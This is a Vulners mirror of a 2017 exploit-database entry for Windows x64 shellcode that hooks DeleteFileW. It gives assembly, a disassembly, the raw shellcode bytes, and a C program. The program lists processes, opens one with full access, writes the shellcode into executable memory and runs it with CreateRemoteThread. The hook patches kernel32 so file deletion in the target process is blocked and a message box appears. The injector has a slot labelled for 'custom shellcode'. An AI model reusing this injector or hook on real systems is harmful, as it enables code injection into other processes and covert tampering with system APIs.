Vulners
Lucene search
Windows x64 - API Hooking Shellcode (117 bytes)
/*
# Title : Windows x64 API Hooking Shellcode
# Author : Roziul Hasan Khan Shifat
# Size : 117 bytes
# Date : 16/10/2017
# Email : [email protected]
# Tested On : Windows 7 Ultimate x64
*/
/*
This Shellcode hooks DeteleFileW() API
Warning: Do no Use this Shellcode on explorer.exe Otherwise You won't be able to delete file from Recycle Bin
*/
/*
section .text
global _start
_start:
xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PPEB
mov rax,[rax+24] ;PPEB->Ldr
mov rsi,[rax+32] ;Ldr->InMemOrderModuleList.Flink
mov rax,[rsi]
mov rsi,[rax]
mov rdi,[rsi+32] ;rdi=kernel32.dll base Address
;---------------------------------------------------------------
xor rsi,rsi
mov si,0x29f0
add rsi,rdi ;rsi=VirtualProtect()
;----------------------------------
;This Part is Important
xor r12,r12
mov r12w,0xa2b0 ;0x0000a2b0 is Relative Address of DeleteFileW()
add r12,rdi ;r12=DeleteFileW()
;---------------------------------------------------
;Changing memory attribute
mov rcx,r12
push rdx
mov dl,9
pop r8
mov r8b,0x40
sub rsp,4
lea r14,[rsp]
mov r9,r14
call rsi
;--------------------------------------------------------
mov [r12],byte 0xe9
jmp shellcode
inj:
pop rdx
sub rdx,r12
sub rdx,5
mov [r12+1],rdx
xor rdx,rdx
mov dl,9
mov rcx,r12
mov r8d,dword [r14]
mov r9,r14
call rsi
add rsp,4
ret
shellcode:
call inj
;This is My own shellcode
db 0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48,0x8b,0x40,0x18,0x48,0x8b,0x70,0x20,0x48,0x8b,0x06,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x20,0x68,0x90,0x65,0x01,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xfb,0x52,0x52,0x48,0xb8,0x75,0x73,0x65,0x72,0x33,0x32,0x2e,0x64,0x48,0x89,0x04,0x24,0x66,0xc7,0x44,0x24,0x08,0x6c,0x6c,0x48,0x8d,0x0c,0x24,0x48,0x83,0xec,0x58,0xff,0xd3,0x68,0xb8,0x12,0x07,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xc3,0x48,0x31,0xc9,0x6a,0x10,0x41,0x59,0x51,0x51,0x48,0xba,0x41,0x50,0x49,0x20,0x42,0x6c,0x6f,0x63,0x48,0x89,0x14,0x24,0xc7,0x44,0x24,0x08,0x6b,0x65,0x64,0x21,0x48,0x8d,0x14,0x24,0x52,0x41,0x58,0x48,0x83,0xec,0x58,0x48,0x83,0xec,0x58,0xff,0xd3,0x90,0x48,0x31,0xd2,0x66,0xba,0x28,0x01,0x48,0x01,0xd4,0xc3
*/
/*
apiint.obj: file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 d2 xor %rdx,%rdx
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
8: 48 8b 40 18 mov 0x18(%rax),%rax
c: 48 8b 70 20 mov 0x20(%rax),%rsi
10: 48 8b 06 mov (%rsi),%rax
13: 48 8b 30 mov (%rax),%rsi
16: 48 8b 7e 20 mov 0x20(%rsi),%rdi
1a: 48 31 f6 xor %rsi,%rsi
1d: 66 be f0 29 mov $0x29f0,%si
21: 48 01 fe add %rdi,%rsi
24: 4d 31 e4 xor %r12,%r12
27: 66 41 bc b0 a2 mov $0xa2b0,%r12w
2c: 49 01 fc add %rdi,%r12
2f: 4c 89 e1 mov %r12,%rcx
32: 52 push %rdx
33: b2 09 mov $0x9,%dl
35: 41 58 pop %r8
37: 41 b0 40 mov $0x40,%r8b
3a: 48 83 ec 04 sub $0x4,%rsp
3e: 4c 8d 34 24 lea (%rsp),%r14
42: 4d 89 f1 mov %r14,%r9
45: ff d6 callq *%rsi
47: 41 c6 04 24 e9 movb $0xe9,(%r12)
4c: eb 22 jmp 70 <shellcode>
000000000000004e <inj>:
4e: 5a pop %rdx
4f: 4c 29 e2 sub %r12,%rdx
52: 48 83 ea 05 sub $0x5,%rdx
56: 49 89 54 24 01 mov %rdx,0x1(%r12)
5b: 48 31 d2 xor %rdx,%rdx
5e: b2 09 mov $0x9,%dl
60: 4c 89 e1 mov %r12,%rcx
63: 45 8b 06 mov (%r14),%r8d
66: 4d 89 f1 mov %r14,%r9
69: ff d6 callq *%rsi
6b: 48 83 c4 04 add $0x4,%rsp
6f: c3 retq
0000000000000070 <shellcode>:
70: e8 d9 ff ff ff callq 4e <inj>
75: 48 31 d2 xor %rdx,%rdx
78: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
7d: 48 8b 40 18 mov 0x18(%rax),%rax
81: 48 8b 70 20 mov 0x20(%rax),%rsi
85: 48 8b 06 mov (%rsi),%rax
88: 48 8b 30 mov (%rax),%rsi
8b: 48 8b 7e 20 mov 0x20(%rsi),%rdi
8f: 68 90 65 01 0a pushq $0xa016590
94: 80 74 24 03 0a xorb $0xa,0x3(%rsp)
99: 5b pop %rbx
9a: 48 01 fb add %rdi,%rbx
9d: 52 push %rdx
9e: 52 push %rdx
9f: 48 b8 75 73 65 72 33 movabs $0x642e323372657375,%rax
a6: 32 2e 64
a9: 48 89 04 24 mov %rax,(%rsp)
ad: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp)
b4: 48 8d 0c 24 lea (%rsp),%rcx
b8: 48 83 ec 58 sub $0x58,%rsp
bc: ff d3 callq *%rbx
be: 68 b8 12 07 0a pushq $0xa0712b8
c3: 80 74 24 03 0a xorb $0xa,0x3(%rsp)
c8: 5b pop %rbx
c9: 48 01 c3 add %rax,%rbx
cc: 48 31 c9 xor %rcx,%rcx
cf: 6a 10 pushq $0x10
d1: 41 59 pop %r9
d3: 51 push %rcx
d4: 51 push %rcx
d5: 48 ba 41 50 49 20 42 movabs $0x636f6c4220495041,%rdx
dc: 6c 6f 63
df: 48 89 14 24 mov %rdx,(%rsp)
e3: c7 44 24 08 6b 65 64 movl $0x2164656b,0x8(%rsp)
ea: 21
eb: 48 8d 14 24 lea (%rsp),%rdx
ef: 52 push %rdx
f0: 41 58 pop %r8
f2: 48 83 ec 58 sub $0x58,%rsp
f6: 48 83 ec 58 sub $0x58,%rsp
fa: ff d3 callq *%rbx
fc: 90 nop
fd: 48 31 d2 xor %rdx,%rdx
100: 66 ba 28 01 mov $0x128,%dx
104: 48 01 d4 add %rdx,%rsp
107: c3 retq
*/
#include<stdio.h>
#include<windows.h>
#include<tlhelp32.h>
#include<string.h>
unsigned char shellcode[]=\
//Main Shellcode (Interceptor Shellcode)
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x48\x31\xf6\x66\xbe\xf0\x29\x48\x01\xfe\x4d\x31\xe4\x66\x41\xbc\xb0\xa2\x49\x01\xfc\x4c\x89\xe1\x52\xb2\x09\x41\x58\x41\xb0\x40\x48\x83\xec\x04\x4c\x8d\x34\x24\x4d\x89\xf1\xff\xd6\x41\xc6\x04\x24\xe9\xeb\x22\x5a\x4c\x29\xe2\x48\x83\xea\x05\x49\x89\x54\x24\x01\x48\x31\xd2\xb2\x09\x4c\x89\xe1\x45\x8b\x06\x4d\x89\xf1\xff\xd6\x48\x83\xc4\x04\xc3\xe8\xd9\xff\xff\xff"
//Your Custom shellcode
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x68\x90\x65\x01\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xfb\x52\x52\x48\xb8\x75\x73\x65\x72\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x68\xb8\x12\x07\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xc3\x48\x31\xc9\x6a\x10\x41\x59\x51\x51\x48\xba\x41\x50\x49\x20\x42\x6c\x6f\x63\x48\x89\x14\x24\xc7\x44\x24\x08\x6b\x65\x64\x21\x48\x8d\x14\x24\x52\x41\x58\x48\x83\xec\x58\x48\x83\xec\x58\xff\xd3\x90\x48\x31\xd2\x66\xba\x28\x01\x48\x01\xd4\xc3";
int main()
{
HANDLE snap,proc,mem;
DWORD len,l,pid;
PROCESSENTRY32 ps;
ps.dwSize=sizeof(ps);
len=strlen(shellcode);
snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(snap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() Failed");
return 0;
}
if(!Process32First(snap,&ps))
{
printf("Process32First() Failed");
return 0;
}
do
{
printf("%s : %ld\n",ps.szExeFile,ps.th32ProcessID);
}while(Process32Next(snap,&ps));
printf("\nEnter Process ID: ");
scanf("%ld",&pid);
proc=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
if(!proc)
{
printf("Failed to Open Process");
return 0;
}
mem=VirtualAllocEx(proc,NULL,len,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(!mem)
{
printf("Failed to allocate memory in process");
return 0;
}
WriteProcessMemory(proc,mem,shellcode,len,NULL);
VirtualProtectEx(proc,mem,len,PAGE_EXECUTE_READ,&l);
CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)mem,NULL,0,0);
CloseHandle(proc);
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Oct 2017 00:00Current
7.1High risk
Vulners AI Score7.1